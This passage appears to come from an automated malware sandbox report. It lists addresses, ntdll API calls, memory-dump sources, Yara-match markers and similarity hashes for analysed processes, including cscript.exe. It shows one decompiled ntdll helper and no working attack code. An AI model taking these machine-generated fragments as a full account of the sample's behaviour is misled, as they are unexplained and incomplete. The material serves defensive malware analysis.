                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007ce7ef
                                          0x007ce7ef
                                          0x007ce7f3
                                          0x007ce807
                                          0x007ce85a
                                          0x007ce85d
                                          0x007ce860
                                          0x007ce8aa
                                          0x007ce8ae
                                          0x00000000
                                          0x00000000
                                          0x007ce8b0
                                          0x007ce8b4
                                          0x00000000
                                          0x007ce8b4
                                          0x007ce862
                                          0x007ce865
                                          0x007ce86e
                                          0x007ce874
                                          0x007ce875
                                          0x007ce87b
                                          0x007ce87f
                                          0x007ce882
                                          0x007ce887
                                          0x007ce88a
                                          0x007ce88d
                                          0x007ce89c
                                          0x007ce8a1
                                          0x007ce8a8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007ce8a8
                                          0x007ce80b
                                          0x007ce80c
                                          0x007ce812
                                          0x007ce815
                                          0x007ce819
                                          0x007ce823
                                          0x007ce827
                                          0x007ce82c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007ce82c
                                          0x007ce82e
                                          0x007ce833
                                          0x007ce837
                                          0x007ce83f
                                          0x00000000
                                          0x00000000
                                          0x007ce856
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007ce858
                                          0x007ce8b9
                                          0x007ce8bd
                                          0x007ce8be
                                          0x007ce8c1
                                          0x00000000
                                          0x007ce7ef
                                          0x007ce794
                                          0x007ce799
                                          0x00000000

                                          APIs
                                          Strings
                                          • ]z, xrefs: 007CE75B
                                          • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 007CE893
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: _wcstoul
                                          • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]z
                                          • API String ID: 1097018459-692138959
                                          • Opcode ID: 22096101cac878c8b58b99fe7b3c89fe8faaa74275e805e4d9121a8889f12b56
                                          • Instruction ID: 98704757b1bf7d3b1d43f40b79b063f1c91a3ae380a81f271e84c71bdbbe11ba
                                          • Opcode Fuzzy Hash: 22096101cac878c8b58b99fe7b3c89fe8faaa74275e805e4d9121a8889f12b56
                                          • Instruction Fuzzy Hash: 71418972D00259EADF109FE4C885FEEB7F8AF05310F14946EE951A6081E778DA88DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0078C558, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • 1u, xrefs: 0078C56F
                                          • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0078C5BB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: 1u${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                          • API String ID: 48624451-2845918265
                                          • Opcode ID: 3cdadbe20c223b17f550228a1149506bf47735b8c2aa3b3073b02a6b79f7c637
                                          • Instruction ID: 2e1af252c6bfde74edc154ef78057dbd59e86601467e82ba10d49215bfbca510
                                          • Opcode Fuzzy Hash: 3cdadbe20c223b17f550228a1149506bf47735b8c2aa3b3073b02a6b79f7c637
                                          • Instruction Fuzzy Hash: BF0184A60086B075D72197AB4C11873FBF99FCEA15728C08EF6D88A296E17FC542D770
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007CE8DB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E007CE8DB(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				short* _t8;
				void* _t10;
				void* _t18;
				void* _t20;

				_t18 = __edx;
				_t1 =  &_a8; // 0x7ae35d
				_t8 = E00768375( *_t1, 0x2c);
				if(_t8 != 0) {
					 *_t8 = 0;
					_t10 = E00805AA6(_t8 + 2,  &_v8, 0x10);
					_t20 = _t10;
					_t30 = _t20;
					if(_t20 != 0) {
						_t23 = _a4;
						_push(_t20);
						_t4 = _t23 + 0x24; // 0x24
						E007A3F92(0x55, 3, "CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X\n", _a8);
						_t10 = E007CE759(_t18, _t30,  *((intOrPtr*)(_a4 + 0x18)), _a8, _t20);
					}
					return _t10;
				}
				return _t8;
			}








                                          0x007ce8db
                                          0x007ce8e3
                                          0x007ce8e6
                                          0x007ce8ef
                                          0x007ce8f4
                                          0x007ce901
                                          0x007ce906
                                          0x007ce90b
                                          0x007ce90d
                                          0x007ce910
                                          0x007ce913
                                          0x007ce914
                                          0x007ce924
                                          0x007ce933
                                          0x007ce938
                                          0x00000000
                                          0x007ce939
                                          0x007ce93b

                                          APIs
                                          • _wcstoul.LIBCMT ref: 007CE901
                                            • Part of subcall function 00805AA6: __cftof.LIBCMT ref: 00805AB6
                                          Strings
                                          • ]z, xrefs: 007CE8E3
                                          • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 007CE91B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: __cftof_wcstoul
                                          • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]z
                                          • API String ID: 1831096779-3069914341
                                          • Opcode ID: 742ad109bcad250e78ca3d0c8ac9931ea8a963fde2bde0135e89c8484c32d008
                                          • Instruction ID: 7271abb3115be30341293e42294f4173e88751ab5a9bc6884e00abcb88f94309
                                          • Opcode Fuzzy Hash: 742ad109bcad250e78ca3d0c8ac9931ea8a963fde2bde0135e89c8484c32d008
                                          • Instruction Fuzzy Hash: C5F0F037140204BAEB202A55EC07F9B77ACDF91B20F04821DFE059A191EAB9EA01CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: cscript.exe PID: 2216 Parent PID: 1764 cscript.exeCOMMON

                                          Executed Functions

                                          Function 0008A360, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00084BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00084BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0008A3AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: 33aa133b1828de7a33f34ff2abfb8f4a657c94ad4ae741a971a1f8b17fb592ea
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A40A, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: e7e3a10ca9ccd7c3be8e36c29fbd26017a075aeffaff3eec138e7c28ce469026
                                          • Instruction ID: a11de42b52788f93da82bead7ef01ab80e4274520370fbf2825824756d9cb6dc
                                          • Opcode Fuzzy Hash: e7e3a10ca9ccd7c3be8e36c29fbd26017a075aeffaff3eec138e7c28ce469026
                                          • Instruction Fuzzy Hash: 73F0ECB2200108BFDB14DF99DC81EEB77A9EF8C354F158648BA5DA7241D630E811CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A410, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: 9146610a82c7d28884839af937c71fe69ddc05b2b6cb9a8e0f7e58f84478092f
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: 28F0A4B2200208ABDB14DF89DC81EEB77ADEF8C754F158259BA1D97241D630E8118BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00072D11,00002000,00003000,00000004), ref: 0008A579
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: bc206d9f2071b923372039f064e3137b2ea009f243bd174e6cd940b4fb91c3e0
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: 27F015B2200208ABDB14DF89CC81EEB77ADEF88754F118159BE0897242C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(00084D50,?,?,00084D50,00000000,FFFFFFFF), ref: 0008A4B5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: 8da779fb4580b145d932e8e32d90a0ec373589454ed40f45412f1b399caffab5
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: F0D012752002146BD710EBD8CC45ED7775CEF44750F154455BA585B242C530F50087E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A45A, Relevance: 1.5, APIs: 1, Instructions: 8filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: d292646b53f3673a97033269a2c46c1d1b3239bf0ab44cc631d5baa1962528d6
                                          • Instruction ID: 63eea2a9cce711fd0ba5915966e7b032c3e5f0516d66f5c824bbb576779f074c
                                          • Opcode Fuzzy Hash: d292646b53f3673a97033269a2c46c1d1b3239bf0ab44cc631d5baa1962528d6
                                          • Instruction Fuzzy Hash: 1FA002BE658214797E3472B53C15CFE560CD5C53B52115967F54D808104457D8541271
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023200C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023207AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
